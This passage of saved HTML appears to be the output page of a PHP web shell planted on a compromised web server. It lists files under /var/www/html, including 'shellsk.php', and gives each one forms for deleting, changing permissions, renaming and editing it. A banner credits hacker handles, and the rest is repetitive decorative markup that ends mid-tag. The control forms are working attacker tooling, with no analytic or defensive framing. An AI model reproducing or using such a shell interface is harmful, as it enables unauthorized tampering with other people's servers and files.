									<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
									<input type="submit" value=">>">
								</form>
							</center>
						</td>
					</tr>					<tr>
						<td>
							<a class="wrn" href="?filesrc=/var/www/html/shellsk.php&amp;path=/var/www/html">shellsk.php</a>
						</td>
						
						<td>
							<center>8.866 KB</center>
						</td>
						<td>
							<center>-rw-rw-r--
							</center>
						</td>
						<td>
							<center>
								<form method="POST" action="?option&amp;path=/var/www/html">
								
									<select name="opt">
										<option value=""></option>
										<option value="delete">Delete</option>
										<option value="chmod">Chmod</option>
										<option value="rename">Rename</option>
										<option value="edit">Edit</option>
									</select>
									
									<input type="hidden" name="type" value="file">
									<input type="hidden" name="name" value="shellsk.php">
									<input type="hidden" name="path" value="/var/www/html/shellsk.php">
									<input type="submit" value=">>">
								</form>
							</center>
						</td>
					</tr>
				</tbody></table>
			</div>

			<br>
			
			<center><br><marquee><b><h4><font face="courier new" color="white">Thanks For 0xGh05T - DSRF14 - Mr.Dan07 - Leri01 - FxshX7 - AlkaExploiter - xLoveSyndrome'z - Acep Gans'z </font></h4></b></marquee></center>
		

</body><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 197.607px; top: 24.9013px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1641.61px; top: -338.992px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 20.0709px; top: 423.393px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 195.011px; top: 44.2586px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1003.95px; top: 102.701px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 214.775px; top: 409.434px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 128.622px; top: 149.762px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 301.415px; top: 523.789px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1791.73px; top: 599.621px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 319.662px; top: -123.134px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1609.64px; top: -488.015px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1524.74px; top: 786.131px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 806.076px; top: -150.705px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1148.84px; top: -26.8129px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 6.93936px; top: -165.501px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1211.21px; top: 130.456px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 51.4726px; top: 230.764px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 127.141px; top: 50.1773px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 241.293px; top: 339.006px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1499.35px; top: 348.808px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1000.04px; top: 368.456px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 824px; top: -870px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1362.88px; top: -217.929px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 119.774px; top: 174.006px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 104px; top: -124px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 659px; top: -430px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1634.55px; top: 319.879px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1386.59px; top: 112.452px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 510.339px; top: -206.918px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 766.184px; top: 54.0392px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 261.461px; top: 714.291px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1171.85px; top: 832.964px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1729.41px; top: 389.687px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 769.169px; top: 56.7362px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 478.654px; top: 747.942px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 876px; top: -57px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 982.191px; top: 88.9392px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1155.28px; top: -19.6699px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 987.221px; top: 156.721px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1175.72px; top: -80.1738px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 397px; top: -201px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 0.5; padding: 0px; margin: 0px; font-size: 7px; line-height: 13px; text-align: center; vertical-align: baseline; left: 1735.18px; top: -159.407px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 535.217px; top: 146.806px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1254.71px; top: 369.178px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1601px; top: -692px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1766.9px; top: 195.924px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1026.88px; top: 160.092px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1765.64px; top: 820.548px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 330.452px; top: 604.31px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 712px; top: -309px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 709px; top: -640px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 693.741px; top: 437.337px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 613.732px; top: 133.4px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 972.736px; top: 125.953px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 869.697px; top: 489.256px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1069.44px; top: 117.366px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 587px; top: -194px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 766.262px; top: -20.9786px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 89.8995px; top: 279.313px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 699.512px; top: -266.646px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 0.8; padding: 0px; margin: 0px; font-size: 9.6px; line-height: 11.2px; text-align: center; vertical-align: baseline; left: 536.012px; top: -776.14px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 977.359px; top: -449.429px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1212.45px; top: -71.6698px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 20.9888px; top: 602.872px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 602.729px; top: 687.884px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 172px; top: -539px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 440px; top: -27px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 32px; top: -851px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1492px; top: -382px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1776px; top: -306px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 608px; top: -900px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 103px; top: -656px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 254px; top: -370px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 644px; top: -617px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 34px; top: -935px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 557px; top: -144px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1426px; top: -510px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 571px; top: -842px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1493px; top: -447px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 161px; top: -401px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 768px; top: -658px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 746px; top: -475px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 348px; top: -66px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1123px; top: -454px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 18px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1152px; top: -908px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 20px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1097px; top: -170px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 647px; top: -712px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 974px; top: -155px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 12px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1226px; top: -560px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1276px; top: -853px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 16px; line-height: 10px; text-align: center; vertical-align: baseline; left: 222px; top: -958px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1133px; top: -577px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 14px; line-height: 10px; text-align: center; vertical-align: baseline; left: 265px; top: -920px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: hidden; font-weight: normal; z-index: 0; display: block; bottom: auto; opacity: 1; padding: 0px; margin: 0px; font-size: 10px; line-height: 10px; text-align: center; vertical-align: baseline; left: 1435px; top: -121px;">•</div><div style="color: rgb(255, 255, 255); position: absolute; width: 8px; height: 8px; font-family: arial, verdana; overflow: 